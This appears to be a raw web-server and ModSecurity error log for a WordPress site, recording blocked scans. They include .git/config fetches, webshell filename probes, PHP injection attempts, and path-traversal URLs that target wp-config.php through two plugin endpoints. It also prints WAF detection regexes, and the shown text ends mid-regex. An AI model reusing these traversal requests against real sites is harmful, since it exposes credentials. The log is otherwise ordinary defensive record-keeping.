(phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:dstr. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/sample"] [unique_id "Zin7f7g2B3BI-S3wKGOlTQAAANE"], referer: www.google.comhttps://t.me/optimasprimetools [Fri Apr 26 00:47:14.083196 2024] [autoindex:error] [pid 12004:tid 140077598500608] [client 99.192.162.198:53804] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Apr 26 06:38:36.325058 2024] [autoindex:error] [pid 25852:tid 140590167545600] [client 185.241.208.215:34628] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/04/26 07:47:50 [error] 25201#25201: *182827 access forbidden by rule, client: 44.201.49.164, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Apr 27 07:28:38.917851 2024] [:error] [pid 6577:tid 139687536572160] [client 45.141.215.245:47688] [client 45.141.215.245] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:dstr. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/sample"] [unique_id "ZizvdqsEfpu1Zpt3S7Sm9gAAANI"], referer: www.google.comhttps://t.me/optimasprimetools [Sat Apr 27 07:28:49.674355 2024] [:error] [pid 5958:tid 139687578535680] [client 45.141.215.245:47698] [client 45.141.215.245] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:dstr. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/sample"] [unique_id "Zizvgbklb0PvhVGMJpa0ZQAAAA0"], referer: www.google.comhttps://t.me/optimasprimetools 2024/04/27 09:21:33 [error] 5921#5921: *200105 access forbidden by rule, client: 109.205.213.18, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/04/27 11:44:29 [error] 5920#5920: *201572 access forbidden by rule, client: 109.205.213.18, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Apr 28 01:16:55.446381 2024] [:error] [pid 17085:tid 139687486215936] [client 37.140.223.183:46548] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Apr 28 01:17:24.078225 2024] [:error] [pid 17001:tid 139687637284608] [client 37.140.223.183:46614] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Apr 28 07:28:38.037276 2024] [autoindex:error] [pid 30046:tid 140203486271232] [client 4.227.19.137:58084] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Apr 28 16:09:49.304352 2024] [authz_core:error] [pid 30932:tid 140203545020160] [client 134.122.28.88:44820] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/28 16:09:51 [error] 30015#30015: *225788 access forbidden by rule, client: 134.122.28.88, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Apr 28 18:47:20.790365 2024] [authz_core:error] [pid 18446:tid 140203494663936] [client 146.190.242.161:49034] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/28 18:47:23 [error] 30015#30015: *228180 access forbidden by rule, client: 146.190.242.161, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Apr 28 19:30:04.364827 2024] [authz_core:error] [pid 30932:tid 140203511449344] [client 167.99.210.137:50192] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/28 19:30:11 [error] 30015#30015: *228797 access forbidden by rule, client: 167.99.210.137, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Apr 28 19:40:09.087586 2024] [authz_core:error] [pid 30046:tid 140203628947200] [client 167.99.182.39:50454] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/28 19:40:12 [error] 30015#30015: *228989 access forbidden by rule, client: 167.99.182.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Apr 29 11:38:35.572954 2024] [autoindex:error] [pid 15694:tid 140266920933120] [client 139.59.34.249:48476] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Apr 29 14:55:23.946324 2024] [autoindex:error] [pid 15512:tid 140266920933120] [client 89.45.197.71:53546] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Apr 29 14:57:12.508832 2024] [autoindex:error] [pid 15694:tid 140266929325824] [client 89.45.197.71:53614] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Apr 29 14:59:28.913073 2024] [autoindex:error] [pid 15694:tid 140266895755008] [client 89.45.197.71:53734] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Apr 29 15:00:05.827013 2024] [autoindex:error] [pid 15694:tid 140266996467456] [client 103.47.113.20:53766] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Apr 29 21:36:52.241737 2024] [:error] [pid 15512:tid 140267046823680] [client 91.134.209.18:36992] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php, referer: investigacionperu.com [Mon Apr 29 21:37:37.453571 2024] [:error] [pid 15694:tid 140266929325824] [client 91.134.209.18:37024] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php, referer: investigacionperu.com [Tue Apr 30 03:57:11.808444 2024] [:error] [pid 30700:tid 140572929025792] [client 45.141.215.39:47212] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Apr 30 03:57:27.143282 2024] [:error] [pid 30701:tid 140572887062272] [client 45.141.215.39:47250] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Apr 30 03:57:27.247653 2024] [:error] [pid 30701:tid 140572794742528] [client 45.141.215.39:47252] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Apr 30 03:58:09.935767 2024] [autoindex:error] [pid 30702:tid 140572744386304] [client 45.141.215.39:47372] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 30 03:58:18.967403 2024] [:error] [pid 32055:tid 140572878669568] [client 45.141.215.39:47394] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Apr 30 03:58:19.857226 2024] [autoindex:error] [pid 32055:tid 140572828313344] [client 45.141.215.39:47398] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 30 03:58:20.787380 2024] [autoindex:error] [pid 30702:tid 140572828313344] [client 45.141.215.39:47402] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 30 03:58:26.253368 2024] [:error] [pid 32055:tid 140572870276864] [client 45.141.215.39:47416] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Apr 30 03:58:26.440180 2024] [:error] [pid 32055:tid 140572836706048] [client 45.141.215.39:47418] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Apr 30 03:59:10.053963 2024] [:error] [pid 30701:tid 140572828313344] [client 45.141.215.39:47522] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Apr 30 03:59:26.875782 2024] [:error] [pid 30700:tid 140572870276864] [client 45.141.215.39:47558] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Apr 30 03:59:27.018824 2024] [:error] [pid 32055:tid 140572903847680] [client 45.141.215.39:47560] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Apr 30 04:00:14.298345 2024] [autoindex:error] [pid 32055:tid 140572929025792] [client 45.141.215.39:47664] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 30 04:00:24.987757 2024] [:error] [pid 32055:tid 140572870276864] [client 45.141.215.39:47692] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Apr 30 04:00:26.106480 2024] [autoindex:error] [pid 30700:tid 140572887062272] [client 45.141.215.39:47696] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 30 04:00:27.612051 2024] [autoindex:error] [pid 30702:tid 140572920633088] [client 45.141.215.39:47700] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 30 04:00:33.613333 2024] [:error] [pid 30701:tid 140572903847680] [client 45.141.215.39:47714] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Apr 30 04:00:33.910530 2024] [:error] [pid 32055:tid 140572752779008] [client 45.141.215.39:47716] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Apr 30 17:26:20.747808 2024] [autoindex:error] [pid 30702:tid 140572811527936] [client 142.93.8.206:41136] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Tue Apr 30 19:18:54.726358 2024] [authz_core:error] [pid 2686:tid 140572794742528] [client 206.189.19.19:44250] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/30 19:19:02 [error] 2656#2656: *262218 access forbidden by rule, client: 206.189.19.19, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/04/30 19:26:29 [error] 2656#2656: *262250 access forbidden by rule, client: 109.205.213.18, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/05/01 00:44:01 [error] 2657#2657: *266275 access forbidden by rule, client: 159.89.127.165, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/01 00:44:01 [error] 2657#2657: *266315 access forbidden by rule, client: 147.182.149.75, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/01 00:44:02 [error] 2657#2657: *266370 access forbidden by rule, client: 147.182.200.94, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/05/01 00:44:02 [error] 2656#2656: *266416 access forbidden by rule, client: 164.90.208.56, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/05/01 00:44:04 [error] 2657#2657: *266472 access forbidden by rule, client: 206.189.19.19, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/05/01 00:44:14 [error] 2657#2657: *266551 access forbidden by rule, client: 157.245.105.107, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/05/01 00:44:26 [error] 2657#2657: *266738 access forbidden by rule, client: 3.239.110.182, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Wed May 01 03:37:25.249406 2024] [ssl:warn] [pid 4001:tid 139723211130752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 01 03:37:29.639883 2024] [ssl:warn] [pid 4004:tid 139723211130752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 01 03:37:30.492012 2024] [ssl:warn] [pid 4004:tid 139723211130752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 01 03:37:34.011831 2024] [ssl:warn] [pid 4004:tid 139723211130752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 01 03:37:36.566907 2024] [ssl:warn] [pid 4489:tid 140041754179456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 01 03:37:52.979797 2024] [ssl:warn] [pid 4493:tid 140041754179456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 01 05:40:50.277251 2024] [autoindex:error] [pid 4742:tid 140041410004736] [client 4.227.123.181:35172] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed May 01 21:32:30.080060 2024] [:error] [pid 4742:tid 140041477146368] [client 176.109.242.241:55284] [client 176.109.242.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php"] [unique_id "ZjL7PkIeBgFkLyan7wckowAAAMM"] [Wed May 01 21:32:30.230091 2024] [:error] [pid 4515:tid 140041368041216] [client 176.109.242.241:55286] [client 176.109.242.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZjL7PnedSKG1pEhWj3QG-gAAABA"] 2024/05/01 23:42:38 [error] 4469#4469: *278818 access forbidden by rule, client: 3.88.145.211, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu May 02 03:34:18.628995 2024] [ssl:warn] [pid 24978:tid 140461661869952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 02 03:34:27.077149 2024] [ssl:warn] [pid 24983:tid 140461661869952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 02 03:34:27.495700 2024] [ssl:warn] [pid 24983:tid 140461661869952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 02 03:34:30.353746 2024] [ssl:warn] [pid 24983:tid 140461661869952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 02 03:34:32.614180 2024] [ssl:warn] [pid 25399:tid 139642790688640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 02 03:34:45.923207 2024] [ssl:warn] [pid 25408:tid 139642790688640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/05/02 21:19:30 [error] 25381#25381: *294771 access forbidden by rule, client: 179.43.152.69, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Fri May 03 00:42:18.495122 2024] [ssl:warn] [pid 25408:tid 139642790688640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 03 03:19:18.691072 2024] [ssl:warn] [pid 18113:tid 140041953400704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 03 03:19:22.904410 2024] [ssl:warn] [pid 18118:tid 140041953400704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 03 03:19:23.468588 2024] [ssl:warn] [pid 18118:tid 140041953400704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 03 03:19:25.713125 2024] [ssl:warn] [pid 18118:tid 140041953400704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 03 03:19:28.003097 2024] [ssl:warn] [pid 18533:tid 140168427009920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 03 03:19:40.241942 2024] [ssl:warn] [pid 18535:tid 140168427009920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 03 03:19:41.212921 2024] [ssl:warn] [pid 18535:tid 140168427009920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 03 05:16:55.115007 2024] [:error] [pid 18885:tid 140168094787328] [client 45.80.158.70:51940] [client 45.80.158.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:dstr. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/sample"] [unique_id "ZjS5l_VnUq_7z9TMwmbwIgAAAMk"], referer: www.google.comhttps://t.me/optimasprimetools [Fri May 03 05:20:37.920429 2024] [autoindex:error] [pid 18885:tid 140167994074880] [client 154.205.157.179:52016] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat May 04 03:30:24.530798 2024] [ssl:warn] [pid 30035:tid 139752862500736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 04 03:30:32.856718 2024] [ssl:warn] [pid 30036:tid 139752862500736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 04 03:30:33.648606 2024] [ssl:warn] [pid 30036:tid 139752862500736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 04 03:30:36.178051 2024] [ssl:warn] [pid 30036:tid 139752862500736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 04 03:30:38.563298 2024] [ssl:warn] [pid 30460:tid 140038820435840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat May 04 03:30:46.843121 2024] [ssl:warn] [pid 30462:tid 140038820435840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/05/04 10:56:10 [error] 30346#30346: *322881 access forbidden by rule, client: 179.43.148.58, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/05/04 12:20:44 [error] 30345#30345: *324005 access forbidden by rule, client: 179.43.191.154, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/04 15:06:50 [error] 30345#30345: *326990 access forbidden by rule, client: 81.17.26.130, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/05/04 20:50:01 [error] 30346#30346: *329872 access forbidden by rule, client: 179.43.178.226, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun May 05 03:21:20.590998 2024] [ssl:warn] [pid 15488:tid 140335554115456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 05 03:21:28.810520 2024] [ssl:warn] [pid 15490:tid 140335554115456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 05 03:21:29.371442 2024] [ssl:warn] [pid 15490:tid 140335554115456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 05 03:21:31.336514 2024] [ssl:warn] [pid 15490:tid 140335554115456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 05 03:21:33.599198 2024] [ssl:warn] [pid 15904:tid 139731810617216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 05 03:21:37.819181 2024] [ssl:warn] [pid 15906:tid 139731810617216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/05/05 13:33:24 [error] 15885#15885: *337948 access forbidden by rule, client: 15.237.83.94, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/05/05 13:48:10 [error] 15886#15886: *338069 access forbidden by rule, client: 15.237.83.94, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/05/05 14:28:18 [error] 15886#15886: *338436 access forbidden by rule, client: 15.237.83.94, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sun May 05 19:03:33.601090 2024] [ssl:warn] [pid 15906:tid 139731810617216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun May 05 19:42:22.719010 2024] [:error] [pid 11813:tid 139731627869952] [client 142.93.66.165:51986] [client 142.93.66.165] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:msfacai. [file 